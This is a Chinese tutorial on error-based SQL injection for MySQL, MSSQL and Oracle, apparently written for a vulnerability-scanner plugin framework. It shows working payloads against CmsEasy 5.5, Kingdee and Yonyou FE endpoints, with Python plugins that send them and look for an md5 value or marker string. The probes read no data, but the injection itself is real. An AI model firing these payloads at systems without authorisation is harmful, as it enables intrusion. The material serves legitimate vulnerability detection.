基于报错的 SQL 注入

这一类的也叫有回显注入,页面会返回错误信息,或者是把注入语句的结果直接返回在页面中。

MySQL 数据库

方法:直接在结果中输出一个 md5 值

其 SQL 语句原型类似:

  1. select md5(233);

实例

CmsEasy 5.5 UTF-8 20140802/celive/live/header.php SQL注入漏洞:

请求的目标 URL

http://xxx.com/celive/live/header.php

POST 数据内容(Payload)

  1. xajax=LiveMessage&xajaxargs[0][name]=1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select md5(233)))a from information_schema.tables group by a)b),'','','','1','127.0.0.1','2') #

手动验证效果图

图 3-1

漏洞验证(伪代码)

md5(233) 的值为 e165421110ba03099a1c0393373c5b43

  1. if 'e165421110ba03099a1c0393373c5b43' in 返回内容:
  2.         security_hole(target, log=log)

范例插件

CmsEasy 5.5 UTF-8 20140802/celive/live/header.php SQL注入漏洞

感谢插件作者: 残废

  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  4. import urllib
  7. def assign(service, arg):
  8.     if service == fingerprint.cmseasy:
  9.         return True, arg
  12. def audit(arg):
  13.     target = arg + '/celive/live/header.php'
  14.     post_data = {
  15.         'xajax': 'LiveMessage',
  16.         'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
  17.                               "floor(rand(0)*2),(select md5(233)))a from "
  18.                               "information_schema.tables group by a)b),"
  19.                               "'','','','1','127.0.0.1','2') #"
  20.     }
  21.     code, head, body, redirect_url, log = hackhttp.http(
  22.         target, post=urllib.urlencode(post_data))
  23.     if 'e165421110ba03099a1c0393373c5b43' in body:
  24.         security_hole(target, log=log)
  26. if __name__ == '__main__':
  27.     from dummy import *
  28.     audit(assign(fingerprint.cmseasy, 'http://localhost/cmseasy/')[1])

MSSQL 数据库

方法:直接在结果中输出一个 md5 值

其 SQL 语句原型类似:

  1. select sys.fn_varbintohexstr(hashbytes('MD5','1234'));

hashbytes()返回 varbinary 类型值

sys.fn_VarBinToHexStr() 是把 varbinary 转换成 varchar

范例插件

金蝶办公系统 get_file.jsp SQL注入漏洞

感谢插件作者: Clown

  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # author:
  4. # Name:金蝶办公系统 get_file.jsp SQL注入漏洞
  6. import time
  8. def assign(service, arg):
  9.     if service == fingerprint.kingdee:
  10.         return True, arg
  13. def audit(arg):
  14.     payload = 'Kingdee/disk/get_file.jsp?file_id=11%29%20and%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271234%27%29%29%2C9%2C10--'
  15.     code,head, res, redirect_url, log = hackhttp.http(arg + payload)
  16.     if code == 200 and '81dc9bdb52d04dc20036dbd8313ed055' in res:
  17.         security_hole(arg + payload + "  :found sql Injection", log=log)
  20. if __name__ == '__main__':
  21.     from dummy import *
  22.     audit(assign(fingerprint.kingdee,'http://www.example.com/')[1])

其中 Payload 是经过 URL 编码后的,解码后的 Payload 为:

  1. payload = 'Kingdee/disk/get_file.jsp?file_id=11) and 1=2 UNION SELECT 1,2,3,4,5,6,7,sys.fn_varbintohexstr(hashbytes('MD5','1234')),9,10--'

Oracle 数据库

方法:Oracle 中输出 md5 值实现起来较为复杂,可以连续输出几个随机的字符来使判断字符串随机化

SQL 语句:

  1. SELECT CHR(97)||CHR(108)||CHR(107)||CHR(100)||CHR(102)||CHR(106)||CHR(103)||CHR(99) FROM foobar

其效果相当于:

  1. SELECT 'alkdfjgc' FROM foobar

这样只用检测 alkdfjgc 是否在返回页面中即可。

注意:所选字符串应该尽量无规律且要有一定长度,不要选用常见的单词(如 get, test, ceshi)。

范例

用友FE协作办公系统 feReport/chartList.jsp SQL 注入漏洞

原漏洞提及多处 SQL 注入,这里只选择其中 Oracle Union 注入:

Payload 为:

  1. feReport/chartList.jsp?delId=1&reportId=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,bvuegrsycgaonod,NULL,NULL,NULL FROM DUAL--

bvuegrsycgaonod 转换后 Payload 为:

  1. feReport/chartList.jsp?delId=1&reportId=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(98)||CHR(118)||CHR(117)||CHR(101)||CHR(103)||CHR(114)||CHR(115)||CHR(121)||CHR(99)||CHR(103)||CHR(97)||CHR(111)||CHR(110)||CHR(111)||CHR(100),NULL,NULL,NULL FROM DUAL--

示例插件

用友FE协作办公系统 feReport/chartList.jsp SQL 注入漏洞检测插件

感谢插件作者: 小光

  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # 用友FE协作办公系统 feReport/chartList.jsp SQL 注入漏洞
  5. import time
  7. def assign(service, arg):
  8.     if service == fingerprint.yongyou_fe:
  9.         return True, arg
  12. def audit(arg):
  13.     payload = 'feReport/chartList.jsp%3FdelId%3D1%26reportId%3D1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHR%2898%29%7C%7CCHR%28118%29%7C%7CCHR%28117%29%7C%7CCHR%28101%29%7C%7CCHR%28103%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%28121%29%7C%7CCHR%2899%29%7C%7CCHR%28103%29%7C%7CCHR%2897%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29%7C%7CCHR%28111%29%7C%7CCHR%28100%29%2CNULL%2CNULL%2CNULL%20FROM%20DUAL--'
  14.     code,head, res, redirect_url, log = hackhttp.http(arg + payload)
  15.     if code == 200 and 'bvuegrsycgaonod' in res:
  16.         security_hole(arg + payload + " : Found SQL Injection", log=log)
  19. if __name__ == '__main__':
  20.     from dummy import *
  21.     audit(assign(fingerprint.yongyou_fe,'http://www.example.com/')[1])